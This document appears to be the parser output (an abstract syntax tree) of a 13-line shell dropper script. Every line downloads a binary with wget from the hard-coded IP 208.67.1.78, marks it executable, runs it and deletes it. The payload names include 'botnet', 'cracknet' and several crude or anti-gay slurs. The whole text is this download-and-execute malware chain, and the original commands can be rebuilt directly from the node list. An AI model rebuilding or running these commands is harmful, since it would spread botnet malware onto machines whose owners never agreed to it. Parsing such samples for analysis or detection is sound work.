ListNode(lineno=2, pos=(12, 131), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 95), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 95), word='http://208.67.1.78/cock'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(95, 96)),
  CommandNode(lineno=2, pos=(97, 110), parts=[
    WordNode(lineno=2, pos=(97, 102), word='chmod'),
    WordNode(lineno=2, pos=(103, 105), word='+x'),
    WordNode(lineno=2, pos=(106, 110), word='cock'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(110, 111)),
  CommandNode(lineno=2, pos=(112, 118), parts=[
    WordNode(lineno=2, pos=(112, 118), word='./cock'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 131), parts=[
    WordNode(lineno=2, pos=(120, 122), word='rm'),
    WordNode(lineno=2, pos=(123, 126), word='-rf'),
    WordNode(lineno=2, pos=(127, 131), word='cock'),
  ]),
])
ListNode(lineno=3, pos=(132, 247), parts=[
  CommandNode(lineno=3, pos=(132, 139), parts=[
    WordNode(lineno=3, pos=(132, 134), word='cd'),
    WordNode(lineno=3, pos=(135, 139), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(140, 142)),
  CommandNode(lineno=3, pos=(143, 154), parts=[
    WordNode(lineno=3, pos=(143, 145), word='cd'),
    WordNode(lineno=3, pos=(146, 154), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(155, 157)),
  CommandNode(lineno=3, pos=(158, 165), parts=[
    WordNode(lineno=3, pos=(158, 160), word='cd'),
    WordNode(lineno=3, pos=(161, 165), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(166, 168)),
  CommandNode(lineno=3, pos=(169, 177), parts=[
    WordNode(lineno=3, pos=(169, 171), word='cd'),
    WordNode(lineno=3, pos=(172, 177), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(178, 180)),
  CommandNode(lineno=3, pos=(181, 185), parts=[
    WordNode(lineno=3, pos=(181, 183), word='cd'),
    WordNode(lineno=3, pos=(184, 185), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(185, 186)),
  CommandNode(lineno=3, pos=(187, 214), parts=[
    WordNode(lineno=3, pos=(187, 191), word='wget'),
    WordNode(lineno=3, pos=(192, 214), word='http://208.67.1.78/net'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(214, 215)),
  CommandNode(lineno=3, pos=(216, 228), parts=[
    WordNode(lineno=3, pos=(216, 221), word='chmod'),
    WordNode(lineno=3, pos=(222, 224), word='+x'),
    WordNode(lineno=3, pos=(225, 228), word='net'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(228, 229)),
  CommandNode(lineno=3, pos=(230, 235), parts=[
    WordNode(lineno=3, pos=(230, 235), word='./net'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(235, 236)),
  CommandNode(lineno=3, pos=(237, 247), parts=[
    WordNode(lineno=3, pos=(237, 239), word='rm'),
    WordNode(lineno=3, pos=(240, 243), word='-rf'),
    WordNode(lineno=3, pos=(244, 247), word='net'),
  ]),
])
ListNode(lineno=4, pos=(248, 375), parts=[
  CommandNode(lineno=4, pos=(248, 255), parts=[
    WordNode(lineno=4, pos=(248, 250), word='cd'),
    WordNode(lineno=4, pos=(251, 255), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(256, 258)),
  CommandNode(lineno=4, pos=(259, 270), parts=[
    WordNode(lineno=4, pos=(259, 261), word='cd'),
    WordNode(lineno=4, pos=(262, 270), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(271, 273)),
  CommandNode(lineno=4, pos=(274, 281), parts=[
    WordNode(lineno=4, pos=(274, 276), word='cd'),
    WordNode(lineno=4, pos=(277, 281), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(282, 284)),
  CommandNode(lineno=4, pos=(285, 293), parts=[
    WordNode(lineno=4, pos=(285, 287), word='cd'),
    WordNode(lineno=4, pos=(288, 293), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 301), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 301), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(301, 302)),
  CommandNode(lineno=4, pos=(303, 333), parts=[
    WordNode(lineno=4, pos=(303, 307), word='wget'),
    WordNode(lineno=4, pos=(308, 333), word='http://208.67.1.78/botnet'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(333, 334)),
  CommandNode(lineno=4, pos=(335, 350), parts=[
    WordNode(lineno=4, pos=(335, 340), word='chmod'),
    WordNode(lineno=4, pos=(341, 343), word='+x'),
    WordNode(lineno=4, pos=(344, 350), word='botnet'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(350, 351)),
  CommandNode(lineno=4, pos=(352, 360), parts=[
    WordNode(lineno=4, pos=(352, 360), word='./botnet'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(360, 361)),
  CommandNode(lineno=4, pos=(362, 375), parts=[
    WordNode(lineno=4, pos=(362, 364), word='rm'),
    WordNode(lineno=4, pos=(365, 368), word='-rf'),
    WordNode(lineno=4, pos=(369, 375), word='botnet'),
  ]),
])
ListNode(lineno=5, pos=(376, 507), parts=[
  CommandNode(lineno=5, pos=(376, 383), parts=[
    WordNode(lineno=5, pos=(376, 378), word='cd'),
    WordNode(lineno=5, pos=(379, 383), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(384, 386)),
  CommandNode(lineno=5, pos=(387, 398), parts=[
    WordNode(lineno=5, pos=(387, 389), word='cd'),
    WordNode(lineno=5, pos=(390, 398), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(399, 401)),
  CommandNode(lineno=5, pos=(402, 409), parts=[
    WordNode(lineno=5, pos=(402, 404), word='cd'),
    WordNode(lineno=5, pos=(405, 409), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(410, 412)),
  CommandNode(lineno=5, pos=(413, 421), parts=[
    WordNode(lineno=5, pos=(413, 415), word='cd'),
    WordNode(lineno=5, pos=(416, 421), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(422, 424)),
  CommandNode(lineno=5, pos=(425, 429), parts=[
    WordNode(lineno=5, pos=(425, 427), word='cd'),
    WordNode(lineno=5, pos=(428, 429), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(429, 430)),
  CommandNode(lineno=5, pos=(431, 462), parts=[
    WordNode(lineno=5, pos=(431, 435), word='wget'),
    WordNode(lineno=5, pos=(436, 462), word='http://208.67.1.78/swatnet'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(462, 463)),
  CommandNode(lineno=5, pos=(464, 480), parts=[
    WordNode(lineno=5, pos=(464, 469), word='chmod'),
    WordNode(lineno=5, pos=(470, 472), word='+x'),
    WordNode(lineno=5, pos=(473, 480), word='swatnet'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(480, 481)),
  CommandNode(lineno=5, pos=(482, 491), parts=[
    WordNode(lineno=5, pos=(482, 491), word='./swatnet'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(491, 492)),
  CommandNode(lineno=5, pos=(493, 507), parts=[
    WordNode(lineno=5, pos=(493, 495), word='rm'),
    WordNode(lineno=5, pos=(496, 499), word='-rf'),
    WordNode(lineno=5, pos=(500, 507), word='swatnet'),
  ]),
])
ListNode(lineno=6, pos=(508, 639), parts=[
  CommandNode(lineno=6, pos=(508, 515), parts=[
    WordNode(lineno=6, pos=(508, 510), word='cd'),
    WordNode(lineno=6, pos=(511, 515), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(516, 518)),
  CommandNode(lineno=6, pos=(519, 530), parts=[
    WordNode(lineno=6, pos=(519, 521), word='cd'),
    WordNode(lineno=6, pos=(522, 530), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(531, 533)),
  CommandNode(lineno=6, pos=(534, 541), parts=[
    WordNode(lineno=6, pos=(534, 536), word='cd'),
    WordNode(lineno=6, pos=(537, 541), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(542, 544)),
  CommandNode(lineno=6, pos=(545, 553), parts=[
    WordNode(lineno=6, pos=(545, 547), word='cd'),
    WordNode(lineno=6, pos=(548, 553), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(554, 556)),
  CommandNode(lineno=6, pos=(557, 561), parts=[
    WordNode(lineno=6, pos=(557, 559), word='cd'),
    WordNode(lineno=6, pos=(560, 561), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(561, 562)),
  CommandNode(lineno=6, pos=(563, 594), parts=[
    WordNode(lineno=6, pos=(563, 567), word='wget'),
    WordNode(lineno=6, pos=(568, 594), word='http://208.67.1.78/dicknet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(594, 595)),
  CommandNode(lineno=6, pos=(596, 612), parts=[
    WordNode(lineno=6, pos=(596, 601), word='chmod'),
    WordNode(lineno=6, pos=(602, 604), word='+x'),
    WordNode(lineno=6, pos=(605, 612), word='dicknet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(612, 613)),
  CommandNode(lineno=6, pos=(614, 623), parts=[
    WordNode(lineno=6, pos=(614, 623), word='./dicknet'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(623, 624)),
  CommandNode(lineno=6, pos=(625, 639), parts=[
    WordNode(lineno=6, pos=(625, 627), word='rm'),
    WordNode(lineno=6, pos=(628, 631), word='-rf'),
    WordNode(lineno=6, pos=(632, 639), word='dicknet'),
  ]),
])
ListNode(lineno=7, pos=(640, 771), parts=[
  CommandNode(lineno=7, pos=(640, 647), parts=[
    WordNode(lineno=7, pos=(640, 642), word='cd'),
    WordNode(lineno=7, pos=(643, 647), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(648, 650)),
  CommandNode(lineno=7, pos=(651, 662), parts=[
    WordNode(lineno=7, pos=(651, 653), word='cd'),
    WordNode(lineno=7, pos=(654, 662), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(663, 665)),
  CommandNode(lineno=7, pos=(666, 673), parts=[
    WordNode(lineno=7, pos=(666, 668), word='cd'),
    WordNode(lineno=7, pos=(669, 673), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(674, 676)),
  CommandNode(lineno=7, pos=(677, 685), parts=[
    WordNode(lineno=7, pos=(677, 679), word='cd'),
    WordNode(lineno=7, pos=(680, 685), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(686, 688)),
  CommandNode(lineno=7, pos=(689, 693), parts=[
    WordNode(lineno=7, pos=(689, 691), word='cd'),
    WordNode(lineno=7, pos=(692, 693), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(693, 694)),
  CommandNode(lineno=7, pos=(695, 726), parts=[
    WordNode(lineno=7, pos=(695, 699), word='wget'),
    WordNode(lineno=7, pos=(700, 726), word='http://208.67.1.78/fucknet'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(726, 727)),
  CommandNode(lineno=7, pos=(728, 744), parts=[
    WordNode(lineno=7, pos=(728, 733), word='chmod'),
    WordNode(lineno=7, pos=(734, 736), word='+x'),
    WordNode(lineno=7, pos=(737, 744), word='fucknet'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(744, 745)),
  CommandNode(lineno=7, pos=(746, 755), parts=[
    WordNode(lineno=7, pos=(746, 755), word='./fucknet'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(755, 756)),
  CommandNode(lineno=7, pos=(757, 771), parts=[
    WordNode(lineno=7, pos=(757, 759), word='rm'),
    WordNode(lineno=7, pos=(760, 763), word='-rf'),
    WordNode(lineno=7, pos=(764, 771), word='fucknet'),
  ]),
])
ListNode(lineno=8, pos=(772, 907), parts=[
  CommandNode(lineno=8, pos=(772, 779), parts=[
    WordNode(lineno=8, pos=(772, 774), word='cd'),
    WordNode(lineno=8, pos=(775, 779), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(780, 782)),
  CommandNode(lineno=8, pos=(783, 794), parts=[
    WordNode(lineno=8, pos=(783, 785), word='cd'),
    WordNode(lineno=8, pos=(786, 794), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(795, 797)),
  CommandNode(lineno=8, pos=(798, 805), parts=[
    WordNode(lineno=8, pos=(798, 800), word='cd'),
    WordNode(lineno=8, pos=(801, 805), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(806, 808)),
  CommandNode(lineno=8, pos=(809, 817), parts=[
    WordNode(lineno=8, pos=(809, 811), word='cd'),
    WordNode(lineno=8, pos=(812, 817), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(818, 820)),
  CommandNode(lineno=8, pos=(821, 825), parts=[
    WordNode(lineno=8, pos=(821, 823), word='cd'),
    WordNode(lineno=8, pos=(824, 825), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(825, 826)),
  CommandNode(lineno=8, pos=(827, 859), parts=[
    WordNode(lineno=8, pos=(827, 831), word='wget'),
    WordNode(lineno=8, pos=(832, 859), word='http://208.67.1.78/cracknet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(859, 860)),
  CommandNode(lineno=8, pos=(861, 878), parts=[
    WordNode(lineno=8, pos=(861, 866), word='chmod'),
    WordNode(lineno=8, pos=(867, 869), word='+x'),
    WordNode(lineno=8, pos=(870, 878), word='cracknet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(878, 879)),
  CommandNode(lineno=8, pos=(880, 890), parts=[
    WordNode(lineno=8, pos=(880, 890), word='./cracknet'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(890, 891)),
  CommandNode(lineno=8, pos=(892, 907), parts=[
    WordNode(lineno=8, pos=(892, 894), word='rm'),
    WordNode(lineno=8, pos=(895, 898), word='-rf'),
    WordNode(lineno=8, pos=(899, 907), word='cracknet'),
  ]),
])
ListNode(lineno=9, pos=(908, 1039), parts=[
  CommandNode(lineno=9, pos=(908, 915), parts=[
    WordNode(lineno=9, pos=(908, 910), word='cd'),
    WordNode(lineno=9, pos=(911, 915), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(916, 918)),
  CommandNode(lineno=9, pos=(919, 930), parts=[
    WordNode(lineno=9, pos=(919, 921), word='cd'),
    WordNode(lineno=9, pos=(922, 930), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(931, 933)),
  CommandNode(lineno=9, pos=(934, 941), parts=[
    WordNode(lineno=9, pos=(934, 936), word='cd'),
    WordNode(lineno=9, pos=(937, 941), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(942, 944)),
  CommandNode(lineno=9, pos=(945, 953), parts=[
    WordNode(lineno=9, pos=(945, 947), word='cd'),
    WordNode(lineno=9, pos=(948, 953), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(954, 956)),
  CommandNode(lineno=9, pos=(957, 961), parts=[
    WordNode(lineno=9, pos=(957, 959), word='cd'),
    WordNode(lineno=9, pos=(960, 961), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(961, 962)),
  CommandNode(lineno=9, pos=(963, 994), parts=[
    WordNode(lineno=9, pos=(963, 967), word='wget'),
    WordNode(lineno=9, pos=(968, 994), word='http://208.67.1.78/weednet'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(994, 995)),
  CommandNode(lineno=9, pos=(996, 1012), parts=[
    WordNode(lineno=9, pos=(996, 1001), word='chmod'),
    WordNode(lineno=9, pos=(1002, 1004), word='+x'),
    WordNode(lineno=9, pos=(1005, 1012), word='weednet'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1012, 1013)),
  CommandNode(lineno=9, pos=(1014, 1023), parts=[
    WordNode(lineno=9, pos=(1014, 1023), word='./weednet'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1023, 1024)),
  CommandNode(lineno=9, pos=(1025, 1039), parts=[
    WordNode(lineno=9, pos=(1025, 1027), word='rm'),
    WordNode(lineno=9, pos=(1028, 1031), word='-rf'),
    WordNode(lineno=9, pos=(1032, 1039), word='weednet'),
  ]),
])
ListNode(lineno=10, pos=(1040, 1167), parts=[
  CommandNode(lineno=10, pos=(1040, 1047), parts=[
    WordNode(lineno=10, pos=(1040, 1042), word='cd'),
    WordNode(lineno=10, pos=(1043, 1047), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1048, 1050)),
  CommandNode(lineno=10, pos=(1051, 1062), parts=[
    WordNode(lineno=10, pos=(1051, 1053), word='cd'),
    WordNode(lineno=10, pos=(1054, 1062), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1063, 1065)),
  CommandNode(lineno=10, pos=(1066, 1073), parts=[
    WordNode(lineno=10, pos=(1066, 1068), word='cd'),
    WordNode(lineno=10, pos=(1069, 1073), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1074, 1076)),
  CommandNode(lineno=10, pos=(1077, 1085), parts=[
    WordNode(lineno=10, pos=(1077, 1079), word='cd'),
    WordNode(lineno=10, pos=(1080, 1085), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1086, 1088)),
  CommandNode(lineno=10, pos=(1089, 1093), parts=[
    WordNode(lineno=10, pos=(1089, 1091), word='cd'),
    WordNode(lineno=10, pos=(1092, 1093), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1093, 1094)),
  CommandNode(lineno=10, pos=(1095, 1125), parts=[
    WordNode(lineno=10, pos=(1095, 1099), word='wget'),
    WordNode(lineno=10, pos=(1100, 1125), word='http://208.67.1.78/gaynet'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1125, 1126)),
  CommandNode(lineno=10, pos=(1127, 1142), parts=[
    WordNode(lineno=10, pos=(1127, 1132), word='chmod'),
    WordNode(lineno=10, pos=(1133, 1135), word='+x'),
    WordNode(lineno=10, pos=(1136, 1142), word='gaynet'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1142, 1143)),
  CommandNode(lineno=10, pos=(1144, 1152), parts=[
    WordNode(lineno=10, pos=(1144, 1152), word='./gaynet'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1152, 1153)),
  CommandNode(lineno=10, pos=(1154, 1167), parts=[
    WordNode(lineno=10, pos=(1154, 1156), word='rm'),
    WordNode(lineno=10, pos=(1157, 1160), word='-rf'),
    WordNode(lineno=10, pos=(1161, 1167), word='gaynet'),
  ]),
])
ListNode(lineno=11, pos=(1168, 1303), parts=[
  CommandNode(lineno=11, pos=(1168, 1175), parts=[
    WordNode(lineno=11, pos=(1168, 1170), word='cd'),
    WordNode(lineno=11, pos=(1171, 1175), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1176, 1178)),
  CommandNode(lineno=11, pos=(1179, 1190), parts=[
    WordNode(lineno=11, pos=(1179, 1181), word='cd'),
    WordNode(lineno=11, pos=(1182, 1190), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1191, 1193)),
  CommandNode(lineno=11, pos=(1194, 1201), parts=[
    WordNode(lineno=11, pos=(1194, 1196), word='cd'),
    WordNode(lineno=11, pos=(1197, 1201), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1202, 1204)),
  CommandNode(lineno=11, pos=(1205, 1213), parts=[
    WordNode(lineno=11, pos=(1205, 1207), word='cd'),
    WordNode(lineno=11, pos=(1208, 1213), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1214, 1216)),
  CommandNode(lineno=11, pos=(1217, 1221), parts=[
    WordNode(lineno=11, pos=(1217, 1219), word='cd'),
    WordNode(lineno=11, pos=(1220, 1221), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1221, 1222)),
  CommandNode(lineno=11, pos=(1223, 1255), parts=[
    WordNode(lineno=11, pos=(1223, 1227), word='wget'),
    WordNode(lineno=11, pos=(1228, 1255), word='http://208.67.1.78/queernet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1255, 1256)),
  CommandNode(lineno=11, pos=(1257, 1274), parts=[
    WordNode(lineno=11, pos=(1257, 1262), word='chmod'),
    WordNode(lineno=11, pos=(1263, 1265), word='+x'),
    WordNode(lineno=11, pos=(1266, 1274), word='queernet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1274, 1275)),
  CommandNode(lineno=11, pos=(1276, 1286), parts=[
    WordNode(lineno=11, pos=(1276, 1286), word='./queernet'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1286, 1287)),
  CommandNode(lineno=11, pos=(1288, 1303), parts=[
    WordNode(lineno=11, pos=(1288, 1290), word='rm'),
    WordNode(lineno=11, pos=(1291, 1294), word='-rf'),
    WordNode(lineno=11, pos=(1295, 1303), word='queernet'),
  ]),
])
ListNode(lineno=12, pos=(1304, 1435), parts=[
  CommandNode(lineno=12, pos=(1304, 1311), parts=[
    WordNode(lineno=12, pos=(1304, 1306), word='cd'),
    WordNode(lineno=12, pos=(1307, 1311), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1312, 1314)),
  CommandNode(lineno=12, pos=(1315, 1326), parts=[
    WordNode(lineno=12, pos=(1315, 1317), word='cd'),
    WordNode(lineno=12, pos=(1318, 1326), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1327, 1329)),
  CommandNode(lineno=12, pos=(1330, 1337), parts=[
    WordNode(lineno=12, pos=(1330, 1332), word='cd'),
    WordNode(lineno=12, pos=(1333, 1337), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1338, 1340)),
  CommandNode(lineno=12, pos=(1341, 1349), parts=[
    WordNode(lineno=12, pos=(1341, 1343), word='cd'),
    WordNode(lineno=12, pos=(1344, 1349), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1350, 1352)),
  CommandNode(lineno=12, pos=(1353, 1357), parts=[
    WordNode(lineno=12, pos=(1353, 1355), word='cd'),
    WordNode(lineno=12, pos=(1356, 1357), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1357, 1358)),
  CommandNode(lineno=12, pos=(1359, 1390), parts=[
    WordNode(lineno=12, pos=(1359, 1363), word='wget'),
    WordNode(lineno=12, pos=(1364, 1390), word='http://208.67.1.78/ballnet'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1390, 1391)),
  CommandNode(lineno=12, pos=(1392, 1408), parts=[
    WordNode(lineno=12, pos=(1392, 1397), word='chmod'),
    WordNode(lineno=12, pos=(1398, 1400), word='+x'),
    WordNode(lineno=12, pos=(1401, 1408), word='ballnet'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1408, 1409)),
  CommandNode(lineno=12, pos=(1410, 1419), parts=[
    WordNode(lineno=12, pos=(1410, 1419), word='./ballnet'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1419, 1420)),
  CommandNode(lineno=12, pos=(1421, 1435), parts=[
    WordNode(lineno=12, pos=(1421, 1423), word='rm'),
    WordNode(lineno=12, pos=(1424, 1427), word='-rf'),
    WordNode(lineno=12, pos=(1428, 1435), word='ballnet'),
  ]),
])
ListNode(lineno=13, pos=(1436, 1555), parts=[
  CommandNode(lineno=13, pos=(1436, 1443), parts=[
    WordNode(lineno=13, pos=(1436, 1438), word='cd'),
    WordNode(lineno=13, pos=(1439, 1443), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1444, 1446)),
  CommandNode(lineno=13, pos=(1447, 1458), parts=[
    WordNode(lineno=13, pos=(1447, 1449), word='cd'),
    WordNode(lineno=13, pos=(1450, 1458), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1459, 1461)),
  CommandNode(lineno=13, pos=(1462, 1469), parts=[
    WordNode(lineno=13, pos=(1462, 1464), word='cd'),
    WordNode(lineno=13, pos=(1465, 1469), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1470, 1472)),
  CommandNode(lineno=13, pos=(1473, 1481), parts=[
    WordNode(lineno=13, pos=(1473, 1475), word='cd'),
    WordNode(lineno=13, pos=(1476, 1481), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1482, 1484)),
  CommandNode(lineno=13, pos=(1485, 1489), parts=[
    WordNode(lineno=13, pos=(1485, 1487), word='cd'),
    WordNode(lineno=13, pos=(1488, 1489), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1489, 1490)),
  CommandNode(lineno=13, pos=(1491, 1519), parts=[
    WordNode(lineno=13, pos=(1491, 1495), word='wget'),
    WordNode(lineno=13, pos=(1496, 1519), word='http://208.67.1.78/unet'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1519, 1520)),
  CommandNode(lineno=13, pos=(1521, 1534), parts=[
    WordNode(lineno=13, pos=(1521, 1526), word='chmod'),
    WordNode(lineno=13, pos=(1527, 1529), word='+x'),
    WordNode(lineno=13, pos=(1530, 1534), word='unet'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1534, 1535)),
  CommandNode(lineno=13, pos=(1536, 1542), parts=[
    WordNode(lineno=13, pos=(1536, 1542), word='./unet'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1542, 1543)),
  CommandNode(lineno=13, pos=(1544, 1555), parts=[
    WordNode(lineno=13, pos=(1544, 1546), word='rm'),
    WordNode(lineno=13, pos=(1547, 1550), word='-rf'),
    WordNode(lineno=13, pos=(1551, 1555), word='unet'),
  ]),
])
ListNode(lineno=14, pos=(1556, 1683), parts=[
  CommandNode(lineno=14, pos=(1556, 1563), parts=[
    WordNode(lineno=14, pos=(1556, 1558), word='cd'),
    WordNode(lineno=14, pos=(1559, 1563), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1564, 1566)),
  CommandNode(lineno=14, pos=(1567, 1578), parts=[
    WordNode(lineno=14, pos=(1567, 1569), word='cd'),
    WordNode(lineno=14, pos=(1570, 1578), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1579, 1581)),
  CommandNode(lineno=14, pos=(1582, 1589), parts=[
    WordNode(lineno=14, pos=(1582, 1584), word='cd'),
    WordNode(lineno=14, pos=(1585, 1589), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1590, 1592)),
  CommandNode(lineno=14, pos=(1593, 1601), parts=[
    WordNode(lineno=14, pos=(1593, 1595), word='cd'),
    WordNode(lineno=14, pos=(1596, 1601), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1602, 1604)),
  CommandNode(lineno=14, pos=(1605, 1609), parts=[
    WordNode(lineno=14, pos=(1605, 1607), word='cd'),
    WordNode(lineno=14, pos=(1608, 1609), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1609, 1610)),
  CommandNode(lineno=14, pos=(1611, 1641), parts=[
    WordNode(lineno=14, pos=(1611, 1615), word='wget'),
    WordNode(lineno=14, pos=(1616, 1641), word='http://208.67.1.78/yougay'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1641, 1642)),
  CommandNode(lineno=14, pos=(1643, 1658), parts=[
    WordNode(lineno=14, pos=(1643, 1648), word='chmod'),
    WordNode(lineno=14, pos=(1649, 1651), word='+x'),
    WordNode(lineno=14, pos=(1652, 1658), word='yougay'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1658, 1659)),
  CommandNode(lineno=14, pos=(1660, 1668), parts=[
    WordNode(lineno=14, pos=(1660, 1668), word='./yougay'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1668, 1669)),
  CommandNode(lineno=14, pos=(1670, 1683), parts=[
    WordNode(lineno=14, pos=(1670, 1672), word='rm'),
    WordNode(lineno=14, pos=(1673, 1676), word='-rf'),
    WordNode(lineno=14, pos=(1677, 1683), word='yougay'),
  ]),
])
